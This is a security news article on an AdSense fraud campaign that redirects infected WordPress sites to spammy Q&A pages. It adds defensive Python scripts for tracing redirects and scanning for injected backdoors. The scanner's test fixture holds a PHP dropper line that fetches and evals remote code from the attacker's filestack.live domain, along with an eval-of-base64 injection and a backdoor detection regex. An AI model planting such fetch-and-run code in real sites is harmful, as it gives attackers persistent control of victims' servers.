
AdSense fraud campaign relies on 10,890 sites that were infected since September 2022

The threat actors behind a massive AdSense fraud campaign have infected 10,890 WordPress sites since September 2022.

In November 2022, researchers at security firm Sucuri reported a surge in WordPress malware that redirected website visitors to fake Q&A sites via ois[.]is. The experts had been tracking the campaign since September 2022; at the time, its apparent end goal was black hat SEO, aimed at boosting the search reputation of the attacker's own sites.

Sucuri's SiteCheck scanner detected the redirects on over 2,500 sites during September and October 2022, while PublicWWW results showed nearly 15,000 websites affected by the malware.

Sucuri now reports that, since September, its SiteCheck remote scanner has detected this campaign on 10,890 infected sites, and that activity has surged, with over 70 new malicious domains masquerading as URL shorteners. More than 2,600 newly infected sites have been detected since January 2023 alone.

Traffic from the hacked websites is redirected to low-quality Q&A sites running the Question2Answer CMS, which host discussions about cryptocurrency and blockchain.

The threat actors' main goal remains ad fraud: the redirected traffic lands on pages carrying the attackers' own AdSense publisher ID, so every ad impression and click on those pages generates revenue for them.

“All of the malicious URLs pretend to look like they belong to some URL shortening service. Some of them even mimic names of reputable URL shorteners like Bitly (e.g. bitly[.]best, b-i-t-l-y[.]co, bit-ly[.]mobi, etc).” reads the analysis published by Sucuri. “If you enter any of these domain names in a browser, you’ll be redirected to a real URL shortening service: Bitly, Cuttly or ShortUrl.at, which makes it look like they are just alternative domains for the well known services. However, they are not real public URL shorteners — each of the domains has only a few working URLs that redirect visitors to spammy Q&A sites with prominent AdSense monetization.”

Recently, the threat actors moved all of their domains from Cloudflare to DDoS-Guard, a Russian bulletproof hosting provider. All of these domains now resolve to the IP address 190[.]115[.]26[.]9.

Unlike previous waves of the campaign, the latest one also redirects through Bing search-result URLs and through Twitter t[.]co short URLs such as t[.]co/Xa4ZRqsp8C and t[.]co/KgdLpz31TG.
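To investigate a suspect short URL without a browser, walk the chain one HTTP hop at a time; that is also how you confirm that a "shortener" domain only forwards to the spammy Q&A sites. The script below is an added example written for this article, not Sucuri's tooling. It flags hops that match indicators named above (ois[.]is, t.co and the DDoS-Guard address 190[.]115[.]26[.]9). The assumption that Bing search-result redirects use the www.bing.com/ck/a click-tracking path is mine, as are the .invalid hostnames and the constructed response table that let it run offline. It follows only HTTP Location redirects: a JavaScript redirect in the page body shows up as a final 200 response whose body must then be read by hand.

```python
"""Hop-by-hop redirect tracer for fake-shortener chains.

Added example, not Sucuri's tooling. Follows HTTP Location redirects one
hop at a time (no JavaScript execution) and flags hops matching indicators
from the article: the ois[.]is redirector, Twitter's t.co, Bing click
URLs and the DDoS-Guard IP the shortener domains were moved to.
"""
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

IOC_HOSTS = {"ois.is", "t.co"}      # article indicators, defanging removed
IOC_IPS = {"190.115.26.9"}
BING_CLICK_PATH = "/ck/a"           # assumption: Bing result-click redirect path


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so every hop is observable."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, timeout=10):
    """Live fetch returning (status, Location header or None). Needs network.
    A browser-like User-Agent matters: redirect scripts often hide from bots."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")


def trace_redirects(url, fetch=http_fetch, max_hops=10):
    """Return the URLs visited, starting with `url`. `fetch(url)` returns
    (status, location). Stops at a non-3xx, a missing Location, a loop
    (the repeated URL is appended so the loop is visible) or max_hops."""
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if not (300 <= status < 400) or not location:
            break
        nxt = urljoin(chain[-1], location)
        chain.append(nxt)
        if nxt in seen:
            break
        seen.add(nxt)
    return chain


def flag_hops(chain, resolve=socket.gethostbyname):
    """Return (url, reason) pairs for hops matching the IOCs. `resolve` maps
    a hostname to an IP; pass a dict lookup to stay offline."""
    findings = []
    for hop in chain:
        parts = urlparse(hop)
        host = (parts.hostname or "").lower()
        if host in IOC_HOSTS:
            findings.append((hop, f"known redirector host {host}"))
        elif host.endswith("bing.com") and parts.path.startswith(BING_CLICK_PATH):
            findings.append((hop, "Bing search-result click redirect"))
        else:
            try:
                ip = resolve(host)
            except (OSError, KeyError):
                continue
            if ip in IOC_IPS:
                findings.append((hop, f"{host} resolves to IOC address {ip}"))
    return findings


# Constructed sample chain: .invalid hostnames are hypothetical; the t.co
# link is one named in the article, but its real target is not known here.
SAMPLE_RESPONSES = {
    "https://fake-shortener.invalid/abc": (302, "https://t.co/Xa4ZRqsp8C"),
    "https://t.co/Xa4ZRqsp8C": (301, "https://qa-spam.invalid/?q=crypto"),
    "https://qa-spam.invalid/?q=crypto": (200, None),
}
SAMPLE_DNS = {"qa-spam.invalid": "190.115.26.9"}


def demo():
    """Run the tracer against the constructed sample, fully offline."""
    chain = trace_redirects("https://fake-shortener.invalid/abc",
                            fetch=lambda u: SAMPLE_RESPONSES.get(u, (404, None)))
    return chain, flag_hops(chain, resolve=SAMPLE_DNS.__getitem__)


if __name__ == "__main__":
    for url, reason in demo()[1]:
        print(f"{url}  <- {reason}")
```

For a live check, call `trace_redirects("https://<suspect-domain>/<path>")` with the default fetcher from an isolated host; the fake shorteners serve different targets to different visitors, so vary the User-Agent and Referer if the chain ends early.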

“Unwanted redirects via fake short URL to fake Q&A sites result in inflated ad views/clicks and therefore inflated revenue for whomever is behind this campaign. It is one very large and ongoing campaign of organised advertising revenue fraud.” continues the analysis.

Analysis of the compromised WordPress sites revealed that the threat actors injected obfuscated PHP code to perform the traffic redirection and planted PHP backdoors to maintain persistence.

“On some infected sites we also find a similarly obfuscated injection in files like wp-blog-header.php,” the report continues, before describing the website backdoors the attackers use to maintain unauthorized access. “These backdoors download additional shells and a Leaf PHP mailer script from a remote domain filestack[.]live and place them in files with random names in wp-includes, wp-admin and wp-content directories.”

“Since the additional malware injection is lodged within the wp-blog-header.php file, it will execute whenever the website is loaded and reinfect the website. This ensures that the environment remains infected until all traces of the malware are dealt with.” concludes the report.
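A first check on a suspected site is to look for the two persistence mechanisms the report describes: anything beyond the stock skeleton of wp-blog-header.php, and PHP files under wp-includes, wp-admin or wp-content that are not in a known manifest or that reference the drop domain. The scanner below is an added example, not Sucuri's SiteCheck and not the campaign's signature. The obfuscation heuristics (eval, base64_decode, gzinflate, variable function calls, chr() string building) are generic; the injected one-liner, the random-named dropper and the sample site built in a temporary directory are all constructed to exercise it.

```python
"""Scanner for the persistence described in the report: an obfuscated
injection in wp-blog-header.php and random-named PHP files dropped into
wp-includes, wp-admin and wp-content. Added example, not Sucuri's scanner;
heuristics are generic and the sample site is constructed in a temp dir."""
import os
import re
import shutil
import tempfile

# Stock wp-blog-header.php loads wp-load.php, calls wp() and loads the
# template loader, nothing else (assumption: current WordPress core).
STOCK_HEADER_REFS = ("wp-load.php", "wp();", "template-loader.php")

# Generic obfuscation/backdoor primitives: decode-and-eval calls, variable
# function calls like $a($b), and chr()-concatenated string building.
SUSPICIOUS = re.compile(
    r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|create_function)\s*\("
    r"|\$[A-Za-z_]\w*\s*\(\s*\$"
    r"|chr\s*\(\s*\d+\s*\)\s*\.\s*chr"
)
IOC_STRINGS = ("filestack.live", "190.115.26.9")   # from the article
WATCH_DIRS = ("wp-includes", "wp-admin", "wp-content")


def scan_blog_header(path):
    """Report missing stock references and any suspicious line in
    wp-blog-header.php, as a list of (path, reason)."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            src = fh.read()
    except FileNotFoundError:
        return [(path, "wp-blog-header.php missing")]
    findings = [(path, f"stock reference {ref!r} absent")
                for ref in STOCK_HEADER_REFS if ref not in src]
    for no, line in enumerate(src.splitlines(), 1):
        if SUSPICIOUS.search(line):
            findings.append((path, f"line {no}: suspicious: {line.strip()[:70]}"))
    return findings


def scan_tree(root, manifest):
    """Walk the watched dirs. `manifest` is the set of relative PHP paths a
    clean install and plugin set are known to contain; anything else, or any
    file carrying an IOC string or suspicious primitive, is reported."""
    findings = []
    for sub in WATCH_DIRS:
        for dirpath, _, names in os.walk(os.path.join(root, sub)):
            for name in names:
                if not name.endswith(".php"):
                    continue
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                if rel not in manifest:
                    findings.append((rel, "PHP file not in manifest"))
                with open(full, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
                findings += [(rel, f"contains IOC {ioc}") for ioc in IOC_STRINGS if ioc in src]
                if SUSPICIOUS.search(src):
                    findings.append((rel, "obfuscation primitive"))
    return findings


CLEAN_HEADER = (
    "<?php\n"
    "if ( ! isset( $wp_did_header ) ) {\n"
    "\t$wp_did_header = true;\n"
    "\trequire_once __DIR__ . '/wp-load.php';\n"
    "\twp();\n"
    "\trequire_once ABSPATH . WPINC . '/template-loader.php';\n"
    "}\n"
)
# Constructed injection (not the campaign's real code): a decode-and-eval
# one-liner prepended so it runs on every page load before WordPress does.
INJECTED_HEADER = CLEAN_HEADER.replace(
    "<?php\n", "<?php\n@eval(base64_decode('ZWNobyAxOw=='));\n", 1)

SAMPLE_FILES = {   # constructed mini site: three stock files plus the dropper
    "wp-blog-header.php": INJECTED_HEADER,
    "wp-includes/functions.php": "<?php\nfunction esc_html($t) { return $t; }\n",
    "wp-admin/index.php": "<?php\nrequire_once __DIR__ . '/admin.php';\n",
    "wp-content/index.php": "<?php\n// Silence is golden.\n",
    "wp-includes/x7k2p9qa.php":
        "<?php\n$u='http://filestack.live/m.txt';\n@eval(@file_get_contents($u));\n",
}
SAMPLE_MANIFEST = {"wp-includes/functions.php", "wp-admin/index.php",
                   "wp-content/index.php"}


def demo():
    """Build the constructed site in a temp dir, scan it, clean up."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    try:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        header = scan_blog_header(os.path.join(root, "wp-blog-header.php"))
        tree = scan_tree(root, SAMPLE_MANIFEST)
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return header, tree
```

On a real site, build the manifest from a clean copy of the same WordPress version, or let WP-CLI do the comparison against official checksums with `wp core verify-checksums` and `wp plugin verify-checksums`, then run `scan_blog_header` and `scan_tree` over the document root. As the report notes, removing the dropped files without cleaning wp-blog-header.php just leads to reinfection on the next page load, so treat a finding in the header as the item to fix first.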


Pierluigi Paganini

(SecurityAffairs – hacking, AdSense fraud campaign)
